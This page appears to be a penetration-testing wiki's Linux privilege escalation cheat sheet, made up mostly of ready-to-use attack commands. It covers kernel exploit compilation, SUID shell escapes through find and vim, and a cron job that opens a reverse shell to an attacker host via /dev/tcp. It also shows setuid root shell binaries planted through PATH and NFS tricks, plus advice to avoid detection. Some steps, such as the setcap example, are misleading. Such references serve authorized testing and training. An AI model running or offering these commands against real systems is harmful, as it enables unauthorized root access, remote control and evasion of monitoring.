Linux Privilege Escalation

Overview

Privilege escalation in Linux involves techniques to gain higher-level access to a system, typically from a normal user to root access.

Kernel Exploits

1. Kernel Information

# Kernel Version
uname -a
cat /proc/version
dmesg | grep Linux

# Kernel Modules
lsmod
cat /proc/modules

2. Exploit Search

# Search for Exploits
searchsploit <kernel_version>
exploit-db.com
github.com

# Compile and Run
gcc exploit.c -o exploit
chmod +x exploit
./exploit

SUID/SGID Binaries

1. Find SUID/SGID Files

# Find SUID Files
find / -type f -perm -4000 2>/dev/null
find / -type f -perm -u=s 2>/dev/null

# Find SGID Files
find / -type f -perm -2000 2>/dev/null
find / -type f -perm -g=s 2>/dev/null

2. Common SUID/SGID Exploits

# GTFOBins
# https://gtfobins.github.io/

# Example: Using find
find / -name file -exec /bin/sh -p \;

# Example: Using vim
vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'

Capabilities

1. Check Capabilities

# List Capabilities
getcap -r / 2>/dev/null

# Common Capabilities
cap_setuid
cap_setgid
cap_net_bind_service

2. Exploit Capabilities

# Example: Using cap_setuid
setcap cap_setuid+ep /path/to/binary

Cron Jobs

1. Check Cron Jobs

# List Cron Jobs
crontab -l
ls -la /etc/cron*
cat /etc/crontab

# Check Cron Directories
ls -la /etc/cron.d
ls -la /etc/cron.daily
ls -la /etc/cron.hourly
ls -la /etc/cron.monthly
ls -la /etc/cron.weekly

2. Exploit Cron Jobs

# Create Reverse Shell
echo "* * * * * root /bin/bash -c 'bash -i >& /dev/tcp/<attacker_ip>/<port> 0>&1'" > /etc/cron.d/root

Services

1. Check Services

# List Services
systemctl list-units --type=service
service --status-all
ps aux | grep root

# Check Service Permissions
ls -la /etc/init.d/
ls -la /etc/systemd/system/

2. Exploit Services

# Modify Service
systemctl edit <service>
systemctl daemon-reload
systemctl restart <service>

Environment Variables

1. Check Environment

# List Environment Variables
env
set
printenv

# Check PATH
echo $PATH

2. Exploit Environment

# PATH Manipulation
export PATH=/tmp:$PATH
echo 'int main(){setuid(0);system("/bin/bash");}' > /tmp/suid.c
gcc /tmp/suid.c -o /tmp/suid
chmod +s /tmp/suid

NFS

1. Check NFS

# List NFS Shares
showmount -e <target>
cat /etc/exports

# Mount NFS
mount -t nfs <target>:/share /mnt

2. Exploit NFS

# Create SUID Binary
echo 'int main(){setuid(0);system("/bin/bash");}' > /mnt/suid.c
gcc /mnt/suid.c -o /mnt/suid
chmod +s /mnt/suid

Tools

1. Primary Tools

LinPEAS
LinEnum
Linux Exploit Suggester
GTFOBins
Metasploit

2. Additional Tools

Pspy
Pspy64
Linux Smart Enumeration
BeRoot
Unix Privesc Check

Best Practices

1. Escalation Strategy

Start with automated tools
Check common vectors
Document findings
Test exploits safely
Follow engagement scope

2. OPSEC Considerations

Use stealth techniques
Avoid detection
Monitor for alerts
Use legitimate tools
Follow engagement scope

Resources

Last Updated: 2025-03-2

PreviousClock Skew Too Great NextLinuxPrivEsc Enumeration

Last updated 8 months ago

hashtagOverview

hashtagKernel Exploits

hashtag1. Kernel Information

hashtag2. Exploit Search

hashtagSUID/SGID Binaries

hashtag1. Find SUID/SGID Files

hashtag2. Common SUID/SGID Exploits

hashtagCapabilities

hashtag1. Check Capabilities

hashtag2. Exploit Capabilities

hashtagCron Jobs

hashtag1. Check Cron Jobs

hashtag2. Exploit Cron Jobs

hashtagServices

hashtag1. Check Services

hashtag2. Exploit Services

hashtagEnvironment Variables

hashtag1. Check Environment

hashtag2. Exploit Environment

hashtagNFS

hashtag1. Check NFS

hashtag2. Exploit NFS

hashtagTools

hashtag1. Primary Tools

hashtag2. Additional Tools

hashtagBest Practices

hashtag1. Escalation Strategy

hashtag2. OPSEC Considerations

hashtagResources

Overview

Kernel Exploits

1. Kernel Information

2. Exploit Search

SUID/SGID Binaries

1. Find SUID/SGID Files

2. Common SUID/SGID Exploits

Capabilities

1. Check Capabilities

2. Exploit Capabilities

Cron Jobs

1. Check Cron Jobs

2. Exploit Cron Jobs

Services

1. Check Services

2. Exploit Services

Environment Variables

1. Check Environment

2. Exploit Environment

NFS

1. Check NFS

2. Exploit NFS

Tools

1. Primary Tools

2. Additional Tools

Best Practices

1. Escalation Strategy

2. OPSEC Considerations

Resources